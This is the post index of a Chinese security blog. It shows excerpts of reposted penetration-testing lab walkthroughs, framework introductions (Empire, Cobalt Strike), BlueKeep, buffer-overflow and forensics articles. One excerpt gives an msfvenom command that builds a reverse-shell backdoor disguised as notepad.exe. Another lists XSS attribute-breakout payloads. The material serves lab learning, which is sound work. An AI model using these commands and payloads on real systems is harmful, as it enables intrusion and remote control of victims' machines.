自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(28)
  • 收藏
  • 关注

转载 Moonraker 靶机渗透

0x01 简介攻击Moonraker系统并且找出存在最大的威胁漏洞,通过最大威胁漏洞攻击目标靶机系统并进行提权获取系统中root目录下的flag信息。Moonraker: 1镜像下载地址:http://drive.google.com/open?id=13b2ewq5yqre2UbkLxZ58uHtLfk-SHvmA0x02 信息搜集1.获取目标ip地址,使...

2019-09-25 21:32:00 666

转载 FourAndSix2 靶机渗透

0x01 简介FourAndSix2是易受攻击的一个靶机,主要任务是通过入侵进入到目标靶机系统然后提权,并在root目录中并读取flag.tx信息FourAndSix2.镜像下载地址:https://download.vulnhub.com/fourandsix/FourAndSix2.ova0x02 信息收集1.通过存活主机发现,确定目标机器IP2.端...

2019-09-24 01:40:00 388

转载 Empire – PowerShell 后渗透攻击框架

0x01 简介Empire是一个后渗透攻击框架。它是一个纯粹的PowerShell代理,具有加密安全通信和灵活架构的附加功能。Empire具有在不需要PowerShell.exe的情况下执行PowerShell代理的方法。它可以迅速采用可后期利用的模块,涵盖范围广泛,从键盘记录器到mimikatz等。这个框架是PowerShell Empire和Python Empire项目的组合;...

2019-09-12 22:17:00 645

转载 cve_2019_0708_bluekeep复现采坑

0X01 简介Microsoft Windows是美国微软公司发布的视窗操作系统。远程桌面连接是微软从Windows 2000 Server开始提供的功能组件。2019年5月14日,微软发布了月度安全更新补丁,修复了远程桌面协议(RDP)远程代码执行漏洞。未经身份验证的攻击者利用该漏洞,向目标 Windows主机发送恶意构造请求,可以在目标系统上执行任意代码。近日,Metaspl...

2019-09-09 15:37:00 1512

转载 域渗透-LSA Protection

简介:微软在 2014 年 3 月 12 日添加了 LSA 保护策略,用来防止对进程 lsass.exe 的代码注入,这样一来就无法使用 mimikatz 对 lsass.exe 进行注入,相关操作也会失败。微软官方文档:https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server...

2019-08-31 23:20:00 478

转载 Mimikatz on meterpreter

实验环境:kali 主机:192.168.88.193目标靶机:win2008 R2 192.168.88.130kali 主机上执行生成一个后门 exe:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.193 LPORT=443 -f exe -o notepad.exemsfconsol...

2019-08-31 23:18:00 222

转载 Cobalt_Strike扩展插件

Cobalt_Strike3.14下载:https://download.csdn.net/download/weixin_41082546/11604021https://github.com/harleyQu1nn/AggressorScriptshttps://github.com/bluscreenofjeff/AggressorScriptshttps://git...

2019-08-30 11:25:00 1967

转载 记一次找回win7密码

虚拟机密码忘了。修改启动顺序为CD,设置虚拟机光盘镜像为kali ISO(这里用的是kali 2017.2)。开启按f2进入kali live 模式fdisk -l 查看磁盘分区,找到win7虚拟机所使用的磁盘。mount /dev/sda1 /mnt 挂载完磁盘后需要退出/mnt 目录,重新进入才可以查看挂载的内容,这个在centos上也是这样的。...

2019-08-25 22:18:00 203

转载 win server 2008搭建域环境

0x00 简介1.域控:win server 20082.域内服务器:win server 2008、win server 20033.域内PC:win7 x64、win7 x32、win xp0x01.配置静态IP查看IP地址和网关DNS为127.0.0.1,域控安装过程中会默认安装DNS服务。0x02.安装活动目录角色win+R打开运行,...

2019-08-25 22:11:00 254

转载 vulnhub-XXE靶机渗透

靶机:下载链接:https://download.vulnhub.com/xxe/XXE.zipXXE注入工具下载:https://download.csdn.net/download/weixin_41082546/11609927CTFCrackTools解码工具:https://download.csdn.net/download/weixin_410825...

2019-08-24 23:20:00 378

转载 Raven 2 靶机渗透

0X00 前言Raven 2中一共有四个flag,Raven 2是一个中级boot2root VM。有四个标志要捕获。在多次破坏之后,Raven Security采取了额外措施来强化他们的网络服务器,以防止黑客进入。靶机下载地址:https://download.vulnhub.com/raven/Raven2.ova提权辅助工具LinEnum下载:https://do...

2019-08-24 17:04:00 850

转载 勒索病毒应急处置流程

勒索病毒应急处置流程1.事件状态判断了解现状,了解发病时间,了解系统架构确认被感染主机范围2.临时处置已感染主机:进行网络隔离,禁止使用U盘、移动银盘等移动存储设备未感染主机:ACL隔离、关闭ssh、rdp等协议,禁止使用U盘、移动硬盘。3.信息收集分析样本获取windows:文件排查:msconfig查看启动项%UserProfile%\...

2019-08-22 21:16:00 540

转载 缓冲区溢出实例(二)--Linux

原理:crossfire 1.9.0 版本接受入站 socket 连接时存在缓冲区溢出漏洞。工具:调试工具:edb;###python在漏洞溢出方面的渗透测试和漏洞攻击中,具有很大的优势实验对象:crossfire【多人在线RPG游戏】运行平台:Kali i386 虚拟机【32位,计算机CPU位数是指地址总线位数,64位系统的寻址空间为2^64,寻址过大,难以处...

2019-08-22 21:11:00 441

转载 缓冲区溢出实例(一)--Windows

一、基本概念缓冲区溢出:当缓冲区边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被填满从而覆盖了相邻内存区域的数据。可以修改内存数据,造成进程劫持,执行恶意代码,获取服务器控制权限等。在Windows XP或2k3 server中的SLMail 5.5.0 Mail Server程序的POP3 PASS命令存在缓冲区溢出漏洞,无需身份验证实现远程代码执行。...

2019-08-22 21:09:00 2263

转载 KALI美化-设置CONKY开机启动

简介Conky 是一个应用于桌面环境的系统监视软件,可以在桌面上监控系统运行状态、网络状态等一系列参数https://github.com/brndnmtthws/conky/详细配置文档:http://conky.sourceforge.net/docs.html简洁的用户界面;高度可配置;它既可使用内置的部件(超过 300 多个) 也可使用外部脚本,来在...

2019-08-22 18:52:00 1700

转载 xss实体绕过示例

知识点:倘若是在script、input标签当中,即可突破。Payload' oninput=alert`1` // 当要在input中输入内容时触发事件' oninput=alert`1` ' 同上' onchange=alert`1` // 发生改变的时候触发该事件' onchange=alert`1` ' 同上在scrip...

2019-08-22 18:48:00 1301

转载 安卓模拟器配置全局代理

工具:proxifier目前很多安卓客户端会设置多种方式来验证客户端是否使用了代理,来防止抓包比如:1.检查客户端是否使用了代理,如果使用了代理,客户端就不再发送网络请求2.通过Okhttp设置默认代理3.使用okhttp实现SSL双向认证如果在APP请求网络之前先判断下手机网络是否使用了代理,如果使用了代理就不请求接口,那么我们就无法抓取...

2019-08-22 18:43:00 4303

转载 电子取证基础

电子取证的基本概念科学的运用提取和证明方法,对于从电子数据源提取的证据保护(preservation)、收集(collection)、验证(validation)、鉴定(identification)、分析(analysis)、解释(interpetation)、存档(documentation)和出示(presentation),以有助于进一步的犯罪事件重构或者帮助识别某些与...

2019-08-22 18:36:00 1158

转载 电子取证-活取证2

启动一个文本文件tasklist查看进程列表可以看到notepad.exe正在后台运行procdump -ma notepad.exe notepad.dmp-m memory-a all意思就是将和notepad.exe程序有关的所有内存dump下来保存为.dmp文件当前目录下生成一个notepad.dmp文件将dump文件中的字符...

2019-08-22 18:35:00 333

转载 电子取证-活取证1

电子取证使用dumpit工具将计算机内存镜像保存。并生成raw文件格式文件。检测镜像文件基本信息volatility -f 2008.raw imageinfo检测进程列表及物理内存位置volatility -f 2008.raw --profile=Win2008R2SP1x64 pslist产看进程树,可以轻松了解各进程之间的关系:...

2019-08-22 18:34:00 298

转载 靶机-SickOs 1.2 Walkthrough

SickOs:1.2https://www.vulnhub.com/entry/sickos-12,144/参考:https://www.cnblogs.com/yuzly/p/10854392.html提权辅助工具LinEnum下载:https://download.csdn.net/download/weixin_41082546/11609409提权辅助工具linu...

2019-08-22 18:31:00 272

转载 靶机-droopyCTF Walkthrough

droopyCTFhttps://www.vulnhub.com/?q=droopy&sort=date-des&type=vmCTF镜像合集:https://www.vulnhub.com/?page=18参考:https://www.hackingarticles.in/hack-droopy-vm-ctf-challenge/提权辅助工具LinE...

2019-08-22 18:29:00 228

转载 靶机-BTRSys 2.1 Walkthrough

BTRSys 2.1https://www.vulnhub.com/entry/btrsys-v21,196/参考:https://www.jianshu.com/p/9813095ce04d提权辅助工具LinEnum下载:https://download.csdn.net/download/weixin_41082546/11609409提权辅助工具linuxprivc...

2019-08-22 18:28:00 652

转载 basic-pentesting-1 靶机提权

原文地址:https://www.payload.com.cn/basic-pentesting-1下载地址:https://www.vulnhub.com/entry/basic-pentesting-1,216/提权辅助工具LinEnum下载:https://download.csdn.net/download/weixin_41082546/1160940...

2019-08-22 18:26:00 469

转载 DC-2靶机渗透

靶场下载链接:Download: http://www.five86.com/downloads/DC-2.zipDownload (Mirror): https://download.vulnhub.com/dc/DC-2.zipDownload (Torrent): https://download.vulnhub.com/dc/DC-2.zip.torrent ( Ma...

2019-08-22 18:22:00 347

转载 DC6-靶机渗透

靶场下载链接:Download: http://www.five86.com/downloads/DC-6.zip Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip Download (Torrent): https://download.vulnhub.com/dc/DC-6.zip.torrent ( ...

2019-08-22 18:19:00 541

转载 Coablt strike官方教程中文版

安装和设置系统要求Cobalt Strike的最低系统要求  2 GHz +以上的cpu  2 GB RAM  500MB +可用空间在Amazon的EC2上,至少使用较高核数的CPU(c1.medium,1.7 GB)实例主机。支持的操作系统以下系统支持Cobalt Strike Team Server:  Kali Linux 2018.4 ...

2019-08-21 05:33:00 1338

转载 文件传输的几种常用方法

文件传输的常用方式:http、wget、ftp、tftp、powershell ...apt-get install python-pyftpdlibpython -m pyftpdlib -p 22ftp 127.0.0.1用户名:anonymous密码为空服务端我们可以看到连接信息通过get 将文件下载到客户端使用ftp...

2019-08-21 05:22:00 1354

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除